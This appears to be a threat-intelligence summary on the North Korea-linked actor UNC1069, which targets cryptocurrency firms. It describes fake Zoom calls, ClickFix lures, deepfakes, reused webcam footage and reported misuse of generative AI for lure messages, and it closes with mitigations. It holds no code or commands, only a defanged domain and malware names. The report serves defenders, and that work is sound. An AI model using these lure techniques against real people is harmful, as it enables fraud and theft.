Full Report
The North Korea-linked threat actor known as UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data from Windows and macOS systems with the ultimate goal of facilitating financial theft. "The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated
Analysis Summary
# Threat Actor: UNC1069
## Attribution & Identity
* **Primary Affiliation:** North Korea-linked threat actor.
* **Known Aliases:** CryptoCore, MASAN.
* **Activity Span:** Tracked as active since at least April 2018.
## Activity Summary
UNC1069 is actively targeting the cryptocurrency sector to steal sensitive data, with the ultimate goal of facilitating financial theft. Recent campaigns have shifted focus from traditional finance (TradFi) to the Web3 industry, targeting centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and venture capital fund individuals since at least 2023. The actor employs sophisticated social engineering utilizing compromised accounts, fake meeting setups, and AI-generated deceptive content. Kaspersky tracks the associated campaign under the name "GhostCall."
## Tactics, Techniques & Procedures
- **Social Engineering:** Use of compromised Telegram accounts, fake Zoom meeting invites, and interaction mimicking venture capitalists or legitimate startup founders.
- **Lure Material Generation:** Reported usage of generative Artificial Intelligence (AI) tools (like Gemini) to produce lure messages and messaging related to cryptocurrency.
- **Deceptive Media:** Usage of deepfake images and video lures mimicking real individuals in the cryptocurrency industry.
- **Supply Chain/Software Deception:** Distribution of malware (e.g., a backdoor called BIGMACHO) disguised as legitimate software development kits (SDKs), specifically a Zoom SDK.
- **Infection Mechanism:** Reliance on a "ClickFix infection vector," where victims are prompted to run a troubleshooting command due to a bogus error message following a fake video call.
- **Web Compromise/Phishing:** Redirecting victims via meeting links to fake websites masquerading as Zoom (e.g., `zoom.uswe05[.]us`).
- **Webcam Hijacking:** Stealthily recording and reusing previous victims' webcam footage (deepfakes or recordings) in subsequent deceptive video calls to maintain the illusion of a live interaction.
## Targeting
- **Sectors:** Cryptocurrency sector (Web3), Centralized Exchanges (CEX), software developers at financial institutions, high-technology companies, and venture capital funds.
- **Geography:** Not explicitly detailed in the summary, but targeting global financial/crypto entities.
- **Victims:** Individuals within the specified sectors.
## Tools & Infrastructure
- **Malware Families Deployed:** At least seven unique malware families, including new ones such as:
- SILENCELIFT
- DEEPBREATH
- CHROMEPUSH
- BIGMACHO (a backdoor)
- **Infection Vectors/Stealers:** ClickFix infection vector.
- **Infrastructure:**
- Fake Zoom website: `zoom.uswe05[.]us` (defanged)
- Attacker-controlled infrastructure for storing recorded webcam footage.
## Implications
UNC1069 demonstrates a high level of sophistication by integrating cutting-edge generative AI (including deepfakes and code generation misuse) into traditional but highly effective social engineering strategies. Their persistent focus on the lucrative cryptocurrency/Web3 space highlights their financial motivation and adaptive nature, posing a significant data theft risk to organizations dealing with sensitive digital assets.
## Mitigations
- **Vigilance on Cryptocurrency Lures:** Exercise extreme caution with any unsolicited contact, especially regarding investment opportunities or technical troubleshooting via platforms like Telegram.
- **Verify Meeting Environments:** Be highly suspicious of calls requiring immediate software/troubleshooting downloads or containing unusual video streams or playback segments.
- **Authentication for SDKs/Software:** Scrutinize all software development kits or updates, especially when delivered outside of official channels.
- **Assume Compromise:** Treat unauthorized webcam activity or unexpected system behavior following communication as a high indicator of compromise.